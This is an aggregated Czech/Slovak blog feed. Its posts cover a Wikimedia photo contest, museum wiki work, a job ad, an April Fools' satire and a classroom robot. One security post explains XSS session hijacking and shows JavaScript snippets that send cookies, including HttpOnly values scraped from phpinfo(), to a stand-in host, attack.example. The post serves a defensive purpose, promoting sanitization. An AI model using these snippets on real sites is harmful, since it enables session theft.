Planeta OpenAlt

Dnes vyšel můj nový příspěvek na stránkách SANS Internet Storm Center, v němž se podíváme na počty průmyslových řídicích systémů dostupných z internetu…

Klasické přihlášení do webové aplikace vypadá tak, že zadáte jméno a heslo, formulář odešlete, aplikace přihlašovací údaje ověří a do tzv. sessiony uloží informaci, že jste přihlášeni. Do prohlížeče pak odešle cookie s identifikátorem session (session id), který označuje tu vaši „plechovku“ se session daty. Váš session id nikdo jiný úmyslně nedostane, pokud by ho totiž získal, byl by pak přihlášen do vašeho účtu, což by bylo značně nežádoucí.

Session hijacking

Ale to by tu nesměli být různí mizerové: ti se od vás snaží ideálně nějak nepozorovaně získat právě ten session identifikátor, tím se dostat do vaší sessiony a v podstatě se za vás vydávat, sessionu vám tzv. unést (anglicky se tomu říká „session hijacking“). Takový klasický způsob ukradení session id je pomocí útoku Cross-Site Scripting (XSS), kdy do stránky útočník nějak vloží JavaScript, ať už přímo, nebo vložením externího souboru, který zákeřný kód bude obsahovat. Ten vložený kód může vypadat např. takto:

new Image().src = 'https://attack.example/?cookie=' + encodeURIComponent(document.cookie);

Když pak návštěvník na stránku přijde, jeho prohlížeč uvidí JavaScript, vytvoří objekt typu Image a bude chtít načíst obrázek z uvedené adresy. Ta v parametru cookie obsahuje pro přenos v URL bezpečně zakódované všechny cookie, ke kterým má JavaScript aktuálně přístup, tedy ty, které jsou uložené pro aktuální stránku (dle nastavení atributu Domain, Path atd.) a nemají nastaven příznak HttpOnly.

Útočník si pak na svém serveru attack.example může zobrazit i třeba jenom access log, ve kterém uvidí požadavek na např. /?cookie=PHPSESSID%3D68516bed29d47527b8b23bd7dec20f19, z něj si pak vyzobne session id, v browseru načte stránku, ze které session id ukradl, otevře developer tools a přidá nebo změní cookie PHPSESSID, stránku pak reloadne a rázem je v té samé sessioně, česky sezení, přihlášen jako uživatel chudáka oběti.

Atribut HttpOnly

Pokud cookie má atribut HttpOnly, tak k ní JavaScript nemá přístup a kódem uvedeným výše ukrást nepůjde. To si ostatně můžete vyzkoušet v podstatě na jakémkoliv webu: ve vašem prohlížeči v developer tools si v záložce Application (Chrome) nebo Storage (Firefox) najděte nějakou cookie, která má příznak HttpOnly, a v konzoli, kterou můžete rovnou zobrazit stiskem klávesy Escape, si příkazem document.cookie vypište všechny cookies tak, jak je vidí JavaScript – cookies s HttpOnly tam nebudou.

A cookie se session id, v PHP aplikacích obvykle pojmenovaná PHPSESSID, atribut HttpOnly má často nastaven. V defaultní konfiguraci PHP se ale nenastavuje a je potřeba to udělat dodatečně ručně např. pomocí

ini_set('session.cookie_httponly', true);

Obcházení HttpOnly pomocí phpinfo()

Takže smůla, ledaže… ledaže by na webu někde byl zobrazen výstup z phpinfo(), PHP funkce, která vypisuje úplně všechno o aktuálně použitém PHP. Klasicky bývá na /info.php nebo /phpinfo.php a zmiňoval jsem se o ní v článku o Full Path Disclosure, protože kromě konfigurace PHP a informacích o rozšířeních zobrazí právě i cestu k souborům, která se útočníkům může k něčemu hodit.

Klasický výstup z phpinfo()

Ve výstupu z phpinfo() ale jsou vypsané i hodnoty cookies, které browser při požadavku poslal, včetně těch s HttpOnly, protože takové cookies se normálně po síti přenáší a server je tedy v rámci požadavku obdrží. Ve výpisu tedy bude i hodnota session id, minimálně jako řádek s např. $_COOKIE['PHPSESSID'], ale dle verze PHP a konfigurace klidně i víckrát.

Toho může útočník využít: místo aby kradl session id JavaScriptem přímo z browseru pomocí document.cookie, tak si JavaScriptem pošle požadavek na např. /phpinfo.php, vytáhne si jen tu pro něj zajímavou část odpovědi, kterou pak připojí k následujícímu požadavku, který si pošle k sobě. To zařídí třeba následující kód, který někam do stránek na doméně https://app.example/ vloží místo výše uvedeného new Image().src …:

fetch('https://app.example/info.php')
  .then(response => response.text())
  .then(text => {
    cookie = text.match(/_COOKIE.{1,2000}/)[0];
    fetch('https://attack.example/?cookie=' + encodeURIComponent(cookie));
  });

Na prvním řádku pošleme požadavek na /info.php, druhý a třetí řádek zajistí, že v proměnné text budeme mít výstup z phpinfo(), ze kterého si na čtvrtém řádku vytáhneme řetězec _COOKIE a dalších maximálně 2000 znaků, ve kterých zcela určitě, kromě nějakého toho HTML, bude i session id. Na pátém řádku pak tento podřetězec přidáme do požadavku odesílaného na attack.example. Odpověď už nás nezajímá, stačí že prohlížeč poslal požadavek, a na serveru se pak podíváme do access logu. Mohli bychom si klidně poslat celé phpinfo(), ale potřeba to není, jdeme jenom po cookie se session id.

Pokud budete mít v aplikaci nějaký Cross-Site Scripting, aby útočník mohl vložit svůj zákeřný JavaScript, a výstup z phpinfo(), jedno jestli veřejně nebo za přihlášením, tak mizera může ukrást session id i když cookie, ve které se přenáší, má atribut HttpOnly.

Co s tím?

1. Nemějte na webu XSS
2. Nemějte v aplikaci výstup z phpinfo(), nebo věci jako var_dump($_SERVER) apod., a už vůbec ne veřejně

Teorie i praxe říká, že je lepší počítat s tím, že tam nějaký ten Cross-Site Scripting někdy mít budete, takže bod č. 1 padá. No a výstup z phpinfo() je celkem užitečná věc, takže bod č. 2 je také často nereálný.

Až když jsem psal bug report s titulkem „System Information contains sensitive information like the session id cookie“, tak mě napadl kompromis: phpinfo() v administraci necháme, ale ty důležitý údaje skryjeme, na ty tam stejně nikdo nekouká.

spaze/phpinfo

Už dříve jsem si vytvořil jednoduchý balíček spaze/phpinfo, který vezme výstup z phpinfo(), odřízne HTML hlavičku aby se ten výstup dal vložit do nějakého vlastního designu administrace apod. a inline CSS style="…" nahradí za class="…". Do této třídy jsem přidal sanitizaci, která defaultně nahrazuje hodnotu session id za hvězdičky.

Použití je skoro tak jednoduché jako zavolání phpinfo():

$info = new PhpInfo();
echo $info->getHtml();

Jádrem toho celýho zázraku je v podstatě tenhle kód:

ob_start();
phpinfo();
$info = ob_get_clean();
echo str_replace(session_id(), '*****', $info);

Můžete si ale přidat vlastní nahrazování dalších hodnot jako jsou např. cookie pro permanentní přihlašování a další, můžete si zvolit i vlastní „hvězdičky“:

// $loginToken = getLoginTokenValue(); např.
$info = new PhpInfo();
$info->addSanitization($loginToken, 'hele, asi spíš ne');
echo $info->getHtml();

Na mém webu to všechno zajišťuje třída SanitizedPhpInfo (pokrytá testem), výsledek pak vypadá nějak takhle:

Setec Astronomy je přesmyčka „too many secrets“

Místo prostého volání phpinfo() tedy raději použijte spaze/phpinfo. Funkci phpinfo() jsem přidal i do spaze/phpstan-disallowed-calls, což je rozšíření pro PHPStan, které hledá nebezpečné funkce a další ve vašem kódu.

Device Bound Session Credentials

Kradení cookies ale možná bude velmi brzy již minulostí, Chrome totiž experimentuje s něčím, co nazývají Device Bound Session Credentials. To by mělo zajistit, že sessiona bude svázaná s konkrétním zařízením, používají k tomu veřejné a soukromé klíče a TPM pro jejich uložení. Mělo by to také fungovat jako jakási nadstavba nad klasickými sessions, nemělo by to vyžadovat nějaké brutální změny všeho možného.

Prototyp tohoto řešení už chrání některé Google účty pokud uživatelé používají Chrome Beta a do konce roku 2024 by Device Bound Session Credentials na zkoušku měly být dostupné i veřejnosti a dalším webům jako tzv. Origin Trials.

Dubnové RoboDoupě bude 27.4. proto sledujte web a fórum, kde se dozvíte podrobnosti.

Místo konání: MFF UK, kampus Troja, pavilon N („Impakt“), 2. patro, Laboratoř robotiky.Adresa: V Holešovičkách 2, Praha 8 (zastávka MHD Kuchyňka; auto lze zaparkovat podle mapy tady)1.

Program:

V České republice jsou tisíce staveb, kterým hrozí demolice. Mnoho z nich dlouhodobě chátrá, jiné jsou ohrožené v důsledku změny územního plánu. U některých demolice už začala a je poslední šance je vyfotit. 

Foto: Bývalá kasárna Mokré, autor: Vojtagregor, CC BY-SA 4.0, via Wikimedia Commons.

Ohrožené stavby 

Dennodenně nám před očima mizí mnoho staveb. Některé jsou úplně zbourány, jiné jsou modernizovány a jejich podoba se zásadně promění. Z tohoto důvodu jsme se ve spolku Wikimedia ČR rozhodli zorganizovat fotografickou soutěž zaměřenou na zdokumentování ohrožených staveb.

Foto: Praha Libeňský most, autor: ZSsen, CC BY-SA 4.0, via Wikimedia Commons.

Zapojilo se 58 fotografů

Soutež probíhala od 26. února do 7. dubna a k propagaci soutěže byl použit banner na Wikipedii, který výrazně zvýšil návštěvnost stránky. Do soutěže se tak zapojilo celkem 58 fotografů, kteří dohromady nahráli 175 fotografií. Na úspěšnosti soutěže měla navíc vliv skutečnost, že si téma ohrožených staveb vybrali samotní Wikipedisté.

Mezi nahranými fotografiemi se objevily stavby  jejichž demolice nebo přestavba je, mnohdy doslova, na spadnutí (například Multifunkční dům na Rokycanově nebo Vyšehradský železniční most). Nahrané byly i historické fotografie už neexistujících budov, například Hotelu Praha nebo Studentského domova na Albertově. Všechny nahrané fotografie si můžete prohlédnout v soutěžní galerii. 

Foto: Tvrz Svébohy, autor: Mentlik, CC BY-SA 4.0, via Wikimedia Commons.

Kdo vyhrál?

V porotě soutěže zasedli vítězové hlavní fotografické soutěže Czech WIki Photo 2023 Olga Havlíčková, Luckhy86 a fotograf, člen rady spolku Wikimedia ČR Tadeáš Bednarz (wikipedista:Plánovací kalendář). 

Hodnocení poroty bylo velmi těsné. Na první místě se umístila fotka Nepomyšl č.p. 90 od Gampeho. Na druhém místě se umístil snímek Zámeček v Omleničce od Anaj7. 

1. místo fotografie Nepomyšl č.p. 90, autor: Gampe, CC BY-SA 4.0, via Wikimedia Commons.

2. místo místo fotografie Zámeček v Omleničce, autor: Anaj7, CC BY-SA 4.0, via Wikimedia Commons.

Fotografové, kteří se umístili na prvním a druhém místě vyhrávají poukaz na roční předplatné programu ZPS X na úpravu fotografií od partnera soutěže Zoner a.s a poukázku na fotografické služby od společnosti FotoŠkoda, která dlouhodobě podporuje svobodnou tvorbu na Wikipedii. 

Výhercům srdečně blahopřejeme!

Wiki Loves Earth začíná 1. května!

Pokud jste se nestihli zapojit do soutěže, nemusíte zoufat. Od středy 1. května můžete nahrávat fotografie do českého kola mezinárodní soutěže Wiki Loves Earth Czechia 2024. 

🕊 Jako správný evangelista vám přináším DESATERO 🕊🔐 DESATERO KYBERNETICKÉ BEZPEČNOSTI 🛡  1️⃣ Nejde si pamatovat všechna hesla a přitom je důležité mít pro každý účet jiné a bezpečné. Tenhle zapeklitý problém vyřeší správce hesel – čím dřív se ho …

Příspěvek DESATERO KYBERNETICKÉ BEZPEČNOSTI pochází z Spajk.cz

Marec bola riadna jazda. Po všetkých stránkach: v práci, ale aj politike. Prišla nádej, ale ďalší mesiac aj stret s realitou. Poďme ale na to poporiadku.

• 🇨🇿 Pracovná cesta do Prahy, veľa stretnutí. Okrem toho Startup Festival a Meet & Deal. Tu druhé totálne mimo mojej komfortnej zóny, ale vyplatilo sa. Skontrolovali sme Kuchyň po rekonštrukcii.
• 🇦🇹 2x Viedeň.

• 🔎 V Labyrinth Labs je stále otvorená pozícia pre Business developer managera alebo managerku. 
• 🏘️ S Adamom a Martinom sme si dali v Modre mini-offsite v priestoroch 200 rokov starého Lýcea. Toto musíme zopakovať.

• 🌸 Ešte raz Praha, opäť pracovné stretnutia a Marketingová ochutnávka #5 od Taste.cz. Chcel som aj prevetrať nový foťák – rozkvitnuté ovocné stromy na Petříne, ale začalo mi do toho pršať. Snáď na budúce.
• 🚅 Inak prvý raz, čo som cestoval z Viedene do Prahy. Tá trať po Břeclav ma vždy fascinovala, lebo som absolvoval nespočet ciest po druhej strane Moravy.

Jindřich Fáborský a Michale Koch

• 📖 Z kníh mi rezonovala najviac Přátelé, lásky a ten ohromný průšvih, ktorú som si kúpil len pár týždňov predtým než Matthew Perry zomrel.
• 🐣 Veľkú noc som strávil pokojne s rodinou. Nakopol bike a najazdil prvé tohtoročné kilometre.

• 💩 Prvé kolo prezidentských volieb vyzeralo nádejne. Ako to dopadlo vieme. A ako to bude pokračovať asi tušíme.
• ⏳ Takto pred rokom som napísal prvé Monthly.

Tohle bude osobní. Tenhle blog je hlavně o IT, bezpečnosti, ochraně soukromí a (kyber)dětech. Teď sem dám ale něco osobního – popis toho, jak jsem rozhodl přestat pít alkohol a co mě k tomu vedlo. Nebudu si brát servírky, nebudu lhát, …

Příspěvek Jak jsem přestal pít alkohol 🚱 pochází z Spajk.cz

Tak jako každý měsíc, i v dubnu je tu i nová epizoda pravidelného speciálu podcastu ALEF SecurityCast. Najdete ji na YouTube a na Spotify a podíváme se v ní na opoždění novelizace zákona o kybernetické bezpečnosti, nárůst poptávky po VPN v Texasu, sofistikovaný backdoor v xz-utils i řadu dalších témat…

Ruská agrese na Ukrajině, česká politická scéna, izraelsko-palestinský konflikt i duševní zdraví – to jsou témata, která rezonují v Novinářské ceně 2023. Letos poroty hodnotily rekordní počet nominovaných příspěvků. Vítězky a vítěze v celkem 13 kategoriích budeme znát už 6. května 2024.

Ve 14. ročníku Novinářské ceny porotkyně a porotci hodnotili rekordních 890 přihlášených příspěvků napříč 80 českými médii. Dominovala témata spojená s ruskou agresí na Ukrajině, izraelsko-palestinský konflikt či dění na české politické scéně. Rostoucí trend přetrval i u příspěvků zaměřených na psychické zdraví nebo psychiatrickou péči, u kterých jsme výraznější nárůst zaznamenali během covidové pandemie.

Počet hodnocených příspěvků skokově narostl v kategorii Regionální žurnalistika – porota letos prošla 117 příspěvků oproti loňským 40. To souzní s naší podporou regionálních redakcí a vyzdvihnutí lokálních témat.

„Rok co rok posilujeme komunikaci se šéfredaktorkami a šéfredaktory a zdá se, že se to na stoupajícím počtu nominací projevuje. Největší nárůst pozorujeme v kategorii Regionální žurnalistika, loni porotci hodnotili 40 příspěvků, letos 117. Jsme za to rádi, lokální média podporujeme i jinou formou než vyzdvihováním kvalitních příspěvků. S Nadačním fondem nezávislé žurnalistiky spolupracujeme na nové grantové výzvě Podpora lokální žurnalistiky,“ říká Lucie Zubková, koordinátorka Novinářské ceny.

Slavnostní vyhlášení vítězek a vítězů Novinářské ceny 2023 se uskuteční 6. května 2024.

Složení porot Novinářské ceny 2023

Petr Víteček – Neat Solutions
9. 4. 2024 – úterý

Od IT k práci s dřevem a dál k dřevu s IT. Jaké výzvy přináší pořízení velkého průmyslového KUKA robota pro domácí opracování dřeva, jak se ovládá a plní daty? K tomu srovnání s tříosým CNC, 3D tiskem a laserem.

Lukáš Nekolný, hlavní wiki-rezident Wikimedia ČR a spolupracovník Muzea východních Čech v Hradci Králové, zhodnotil výsledky své wiki-rezidentské práce za rok 2023.

Wiki-rezidentský program v Muzeu východních Čech

Rok 2023 byl prvním celým rokem, kdy v krajském Muzeu východních Čech v Hradci Králové (MVČ) fungoval aktivní wiki-rezidentský program. Samotná  spolupráce probíhala již v předchozích dvou letech a v září 2022 byla zpečetěna podpisem memoranda o partnerství a spolupráci. Na začátku spolupráce byl kladen důraz na rychlé odstranění počátečního nevyhovujícího stavu, kdy na Wikipedii chyběla klíčová hesla a informace o činnosti a působení muzea.

FOTO: Archiv Muzea východních Čech v Hradci Králové, CC BY-SA 4.0, via Wikimedia Commons

V roce 2023 jsme se tak už v rámci wiki-rezidentských aktivit mohli zaměřit na co nejvyšší kvalitu dalších zpracovávaných témat. Ta se drží tří hlavních linií:

1. všeho, co se přímo týká muzea (budovy, expozice, výstavy a osobnosti, které zasáhly do historie muzea),
2. osobností a významných rodů města a kraje,
3. staveb, institucí a míst ve městě a kraji.

Zde je důležité poznamenat, že zatímco před začátkem wiki-rezidentství v muzeu problematiku staveb, expozic a aktivit MVČ pokrývaly jen dva články o souhrnné roční čtenosti přibližně 4 500 zobrazení, za rok 2023 se už jednalo o 11 stránek s více než 10 500 zobrazeními. 

Některá témata vyžadovala poměrně dlouhé období příprav a zpracování, než mohly být výsledné články zveřejněny. Týkalo se to zejména přehledu všech výstav konaných v muzeu během jeho více než stoleté existence. Tato stránka zároveň vytvořila důležitý rozcestník upozorňující na témata, která muzeum řešilo a představovalo, a která mají i v budoucnu potenciál být zpracována na Wiki platformách.

Jedná se zejména o místní, resp. regionální umělce, kteří v minulosti v muzeu pořádali své autorské výstavy. Mnohá z těchto jmen už takřka upadla v zapomnění. Proto je nesmírně důležité, aby je paměťová instituce, jakou je krajské muzeum, připomněla např. formou zpracovaného životopisu na Wikipedii. V té souvislosti začala být budována rozsáhlá interní databáze hesel, které by v budoucnu bylo vhodné zpracovat. Jejich počet přitom řetězově stoupá. 

Rok 2023 byl také ve znamení zpřesňování evidence činnosti zavedením hashtagů a dalších interních přehledů, které nám umožňují rozlišovat i tematické zaměření článků, na jejichž vzniku či rozvoji se muzeum podílelo. Díky tomu víme, že v rámci Wikipedie bylo založeno 25 hesel, z toho 16 se týkalo osobností. Kromě toho byly provedeny úpravy na dalších 100 heslech, přičemž v takřka 40 případech se jednalo o rozšíření většího rozsahu.

Velké množství připravovaných textů však zatím nebylo zveřejněno, neboť se jedná o dlouhodobé a časově náročné úkoly, jejichž cílem je zajistit co nejvyšší kvalitu budoucího výstupu. Samozřejmostí jsou také navazující úpravy Wikidat. V průběhu roku bylo zároveň nahráno 69 souborů na Wikimedia Commons a v budoucnu je v plánu jejich výrazné navýšení.

FOTO: Archiv Muzea východních Čech v Hradci Králové, CC BY-SA 4.0, via Wikimedia Commons

Specifickou kapitolu ve wiki-rezidenství představuje pětiletý projekt Ministerstva kultury NAKI III Historická lázeňská sídla jako kulturní, urbanistický a krajinotvorný fenomén. Projekt odstartoval právě v roce 2023 a první klasické publikační výstupy by z něj měly být hotovy v roce 2024. V témže roce se očekává, že budou zveřejněna i první podrobně zpracovaná hesla o tématu lázní v Česku či lázeňství obecně. 

Tyto výstupy by měly napravit dosavadní velmi neuspokojivý stav české Wikipedie, která se dosud těmto tématům věnovala jen okrajově. Již v roce 2023 k tomu probíhaly přípravy a zpracovávání prvních témat a zdrojů. Projekt je realizován v konsorciu Muzea východních Čech v Hradci Králové, Filozofické fakulty Univerzity Hradec Králové a Historického ústavu Akademie věd České republiky. Spolek Wikimedia ČR jej dlouhodobě podporuje.

Studenti píší Wikipedii na Univerzitě Hradec Králové

Na podzim 2023 proběhl již druhý zimní semestr na Filozofické fakultě Univerzity Hradec Králové, kdy byla v rámci spolupráce univerzity a muzea otevřena výuka předmětu Studenti píší Wikipedii. Po předchozím roce se podařilo vychytat nejvíce problémové situace a předmět byl zakončen s 10 studenty, kteří mohli dostat zápočet. Během poslední společné hodiny zveřejnili 9 nových článků (např. Městské muzeum Nové Město nad Metují, Julius Russ, Zvon Augustin, Šrámkův statek, Novobydžovský čtverec–Memoriál Elišky Junkové). Fakt, že jeden článek zveřejněn studentem nedopatřením výrazně dříve a v nepříliš dobré kvalitě se ukázal být výjimkou.

Jinak byla tentokrát i wikipedistická komunita s kvalitou zveřejněných článků spokojená. Většinově se opět jednalo o studenty prvního ročníku, pro které to byl jeden z prvních předmětů na vysoké škole a kteří dosud neměli takřka žádné zkušenosti s prací se zdroji. Tím spíše považujeme aktuální výsledek za úspěch a příslib do budoucna.

FOTO: Klub přátel historických vozidel, z.s, CC BY-SA 4.0, via Wikimedia Commons

Rozvoj spolupráce s dalšími wiki-rezidenty

Na počátku roku se podpora hlavního wiki-rezidenta zaměřovala hlavně na rozvoj rezidentství v Městské knihovně v Praze. 

V průběhu léta a podzimních měsíců se podařilo GLAM wiki-rezidentství výrazně posunout. Nové wiki-rezidentské pozice zřídila Národní knihovna České republiky a zároveň Zoo Praha, která byla před lety v mnohém v GLAM projektu průlomová. Ta se po několika letech rozhodla alespoň v menším rozsahu wiki-rezidentství obnovit.

Díky tomu jsme se s kolegy ve WMČR dohodli na pravidelném společném setkání wiki-rezidentů, na němž budeme mít možnost se osobně potkávat a spolupracovat jako wiki-rezidentstký tým. Od té doby probíhají pravidelné online schůzky, na nichž můžeme sdílet své problémy i nápady, které tato specifická, a věřím, že i velmi užitečná, činnost přináší. Počátek roku 2024 ukazuje, že své wiki-rezidenty budou mít i další instituce. Je to příslib, že naše česká GLAM komunita bude růst i nadále. 

Lukáš Nekolný

Naša demokracia je relatívne mladá. Aj preto si vyžaduje toľko starostlivosti. S rôznymi priateľmi hovoríme, že sa častejšie stretávame na protestoch, než príjemnom rozhovore. Ale to je to najmenej, čo pre ňu môžeme robiť. Nemusíme pre ňu zomierať, ako naši susedia a bratia.

Mám strašne rád to „Snažiť sa, hľadať, nájsť a nikdy sa nepoddať“ z básne ktorú napísal Lord Alfred Tennyson. Je pre mňa esenciou cyklov života, tým životným múdrom, že to nikdy nebude finálné a hotové.

Keď idem ráno do práce všímam si pri Novej Cvernovke tento strom. Je skvelou fyzickou metaforou chuti po živote. Ale nevie fungovať bez toho na čom vyrástol. Je to jeho súčasťou. Niečo muselo skončiť aby niečo nové mohlo pokračovať. Je tam rovnováha.

Stále verím, že ľudia sú v podstate dobrí. Že chcú žiť dobre. Že chcú aby ich deti a vnúčence žili dobre. Hovorí sa, že každé voľby sú dôležite. A opäť to platí aj pri týchto. Nech sa opäť vrátime aspoň trochu na dobrú cestu. Lebo toto je len začiatok.

Poďte v sobotu voliť, nech to dopadne OK.

Je možné,

že nás prúdy niekam odnesú.

Je možné,

že sa dotkneme šťastných ostrovov.

A aj keď nie sme takí silní,

ako keď sme dokázali pohnúť nebom a zemou

aj tak sme tu.

Sme tu.

Možno nás oslabil čas a osud,

ale vôľu máme silnú.

Snažiť sa, hľadať,

nájsť a nikdy sa nepoddať.

Od verzie 7.4 prechádza Redis na duálne licencovanie a to Redis Source Available License (RSALv2) a Server Side Public License (SSPLv1), namiesto pôvodnej BSD licencie. Nie je teda už open-source, čo sa týka OSI definície.

Reakcia na tieto zmeny prišla pomerne rýchlo zo strany Linux Foundation, ktorá zakladá fork s názvom Valkey. Medzi prvých podporovateľov patria Amazon Web Services (AWS), Google Cloud, Oracle, Ericsson, a Snap Inc.

Valkey bude pokračovať pod BSD licenciou a bude pre platformy Linux, macOS, OpenBSD, NetBSD a FreeBSD. Aktuálne je k dispozícii GitHub repo pre zostavenie zo zdrojových kódov.

Hledáme novou kolegyni nebo nového kolegu, který*á se stane tváří naší kanceláře na 24-28 hodin týdně. Pokud vás baví komunikovat s lidmi a být podporou pro celý tým a věříte, že demokracie je klíčová pro lepší život v České republice, bude pro vás právě naše nadace tím správným zaměstnavatelem. Nabízíme plat 21 000 – 24 000 Kč / měsíc podle výše úvazku. Nástup co nejdříve.

Co bude vaší pracovní náplní?

• zajištění plynulého chodu kanceláře a obstarání administrativních úkolů
• přijímání návštěv a zajištění schůzek s externími hosty
• podpora managementu a týmu při každodenních aktivitách i při realizaci nadačních akcí
• průzkum a komunikace s dodavateli služeb
• vyřizování základní externí komunikace

Co od vás očekáváme?

• schopnost komunikovat s lidmi na všech úrovních
• vstřícnost a proaktivní přístup, chuť být oporou pro své kolegy*ně
• spolehlivost a schopnost organizovat a řešit úkoly samostatně a efektivně
• pozitivní přístup k technologiím 
• zájem o dlouhodobé zaměstnání/spolupráci

Co u nás získáte?

• práci v týmu jedné z největších nadací v ČR
• příjemné kolegy*ně a pracovní prostředí s otevřenou a přátelskou atmosférou
• možnost potkat zajímavé lídry z občanské společnosti, byznysu i státní správy
• podporu v profesním růstu, vzdělávání
• 5 týdnů dovolené, příspěvek na stravování, 3 placené dny zdravotního volna, vánoční volno

Nadace OSF je zaměstnavatel, který se řídí zásadou rovných příležitostí pro všechny a zavazuje se dodržovat Politiku ochrany práv dětí a zvláště zranitelných dospělých.

Zaujala vás naše nabídka?

Pak nám pošlete své CV spolu s motivačním dopisem, proč chcete pracovat v naší nadaci. 

Dnes vyšel můj nový příspěvek na stránkách SANS Internet Storm Center, v němž se podíváme na publikaci varování ohledně backdooru v balíčku xz-utils ze strany vládních a národních CSIRTů…

Tomu poviem šok na slovenskej start-up scéne. Že sa objavý unicorn (firma s hodnotou nad 1 miliardu amerických dolárov) asi nečakal nikto. Veď pre porovnanie ESET je firma s ročným obratom asi 500 miliónov eúr.

Rokovania o kúpe prebiehali od asi Vianoc, kedy founder Štefan Homôľka, zo startupu Baterryl prišiel s priam geniálnym nápadom na alternatívnu výrobu elektrickej energie. Ide o doteraz nevyužitý spôsob generovania elektrického prúdu v alkalických článkoch mechanickým pohybom ukončený tupým nárazom. Práve pri takomto pohybe vniká v galvanickom článku zbytková energia.

Dohoda o akvizícii už bola zverejnená a mimoriadne aj jej hodnota. Čo je celkom nezvyklé. Naviac padlo aj ďalšie tabu a to, že nápad nemá žiadnu hodnotu. Lebo Musk kúpil vlastne samotný nápad. Známy bulvárny a politický online magazín Startitup priniesol v rozhovore s founderom Homôľkom viac informácií. Keďže ide o platený rozhovor vyberám pre vás z neho pár zaujímavostí.

„Bolo to na Prvý sviatok vianočný. Chcel som prepnúť koncert Heleny Vondráčkovej v TV, keď v diaľkovom ovládači prestali fungovať baterky. Žiadne náhradné v dome, obchody zavreté. Tak som doň niekoľko ráz udrel a stihol som prepnúť tesne pred tým, než zaznela Dlouhá noc. V tom mi to došlo – čo ak by sa pomocou pár dobrých rán dali dobiť aj iné zariadenia?“

Elon Musk oznamuje akvizíciu Slovenského startupu

Štefan Homôľka tú noc nevedel podľa jeho slov ani oka zažmúriť. Ako s úsmevom na tvári hovorí, tá „Dlouhá noc“ ho dobehla takýmto spôsobom. Ďalší deň na Štefana sa podelil so všetkým s kamarátmi v krčme, kde bol zhodou okolností aj susedových Paľko. Ten robí v Bratislave a prišiel domov na sviatky. Na nemenovanom úrade sa stará o PC úradníkov. Minulé Vianoce rozprával ako na týchto PC po večeroch ťaží Bitcoin. Všetko malo už rýchly spád, ako Homôľka pre online magazín popisuje.

„Paľko mi vysvetlil, že som ten founder a on bude CTO. Napísal za mňa na cez sieť X priamo Muskovi na čo som prišiel. Ten bol nadšený. Že v tom vidí potenciál potvrdilo aj to, že ihneď ukončil plánovanú rekonštrukciu Gigafactory v Mexiku. Elektromobily tak čaká úplná revolúcia, ako budú dobíjané.“

Predať len nápad zo Slovenska je obrovská vec. Zdá sa, že tu spolupráca nekončí. Prvým zariadením do ktorého bude technológia startupu Baterryl integrovaná bude automobil Tesla Y model 2 určený pre trh východnej Európy a subsaharskej Afriky. S testovaním sa začne na Slovensku. Ako na záver rozhovoru dodáva so šibalským úsmevom Homôľka „vďaka mizernej kvalite našich ciest a nárazom do výmoľov bude možné jazdiť s takýmto dobíjaním batérií úplne zadarmo“. Baterryl s vydaním správy zaželal aj prvý apríl.

"Materiál umí reagovat na vnější podnět, což může být například magnetické pole, změna pH v těle, teplota a další. Cílenou reakcí umíme nastavit to, jak a kam se materiál ohne, jeho výsledný vzhled. Vytiskneme laicky řečeno obyčejnou placičku, ale v těle se materiál prohne třeba do tvaru chrupavky nebo vyplní defekt, který má speciální tvar a špatně by se tisknul z keramiky."
 
 Pacient po operaci nádoru často přijde třeba i o kus kosti. Lékaři si chybějící část naskenují, nechají vytisknout ze speciální keramiky na 3D tiskárně, voperují a postupem času už jen sledují, jak zatímco se původní náhrada rozpouští, nová kost dorůstá. Že je to sci-fi? Když se dostanete do laboratoří CEITEC VUT, uvidíte také umělé chrupavky, kostní lepidlo, materiály měnící tvar v čase nebo náplasti na hojení popálenin. V čele výzkumné skupiny Pokročilé biomateriály stojí Lucy Vojtová, která se v epizodě rozpovídala o tom, jestli biomateriály sbírají na louce, kde jsou limity léčby kmenovými buňkami a co na jejich výzkum říkají lékaři. 

Další „hračky“ pro potřeby kroužku aktivně nevyhledávám, ale nedokážu těm dobrý odolat. Na posledním semináři pro učitele informatiky mě přítomností poctil Milan Lempera, programátor a vedoucí kroužku, který s sebou na ukázku přivezl spoustu udělátek. Mimo jiné doplňky pro microbit od firmy Elecfreaks. Jmenovitě se chci věnovat robůtkovi Cutebot a joystiku. Ukázalo se, že škola zakoupila tři kusy verze 2, takže jsem si je hned půjčil domů, nastudoval, a zařadil na program svého kroužku.

Úvod

Z příspěvků na mém blogu je patrné, že co se robotů týče, vybral jsem si Meet Edison a jsem s nimi spokojen (a to mluvím o verzi dva, trojku jsem ještě neměl v ruce, ale vypadá dobře). Ovšem proč nezkusit něco jiného, že?

Edison je robustní, ale neumožňuje připojovat periferie. Cutebot je opak, zašlápnutí ho asi může dost pocuchat, zato ho lze rozšiřovat.

A je nutné ho sestavit. Není to nic obtížného, ale didakticky to hodnotím pozitivně (IKEA efekt). Zatímco u robota stačí zapojit senzor a oboustrannou páskou přilepit držák baterie, tak u joysticku je nutné i šroubovat, což se u dětí na prvním stupni ukázalo jako velká výzva, která nám zabrala velkou část hodiny. Aby bylo jasno, i za šroubky a čas s nimi strávený jsem rád. Úmyslně jsem to dětem neskládal já předem.

Kód editujete normálně jak jste zvyklí na makecode.microbit.org, jen si přidáte rozšíření blokového jazyka.

Periferie

V krabici dostanete ultrazvukový senzor HC-SR04. Hned vedle konektoru pro ultrazvukový senzor najdete I2C konektor pro další moduly. To je trochu i nevýhoda, protože HC-SR04 velmi snadno vložíte do špatného konektoru a Cutebot se pak chová podivně. Prostě běžné potíže harwarového světa.

Dále se na desce nachází i konektor pro zapojení serva, to jsem ještě nevyzkoušel.

Didaktické materiály

Líbí se mi anglické návody na webu Elecfreaks.

Edison detekuje překážku pomocí infračerveného světla, se kterým podle mě nejde dosáhnout takové přesnosti jako s ultrasonickým čidlem. Využito v lekci 10, udržování fixní vzdálenosti, říkal jsem tomu adaptivní tempomat.

Naší vrcholnou hodinou bylo ovládání Cutebotu joystickem, lekce 13.

Joystick

Joystick na sobě má vibrační motorek pro poskytnutí zpětné vazby (pozor, máte-li microbity v obalech, tak pro tento účel doporučuji sundat).

Jako úlohu ahoj světe pro joystick jsem zvolil ukazatel směru ovládaný gamepadem. V základu se jedná o čtyři směry.

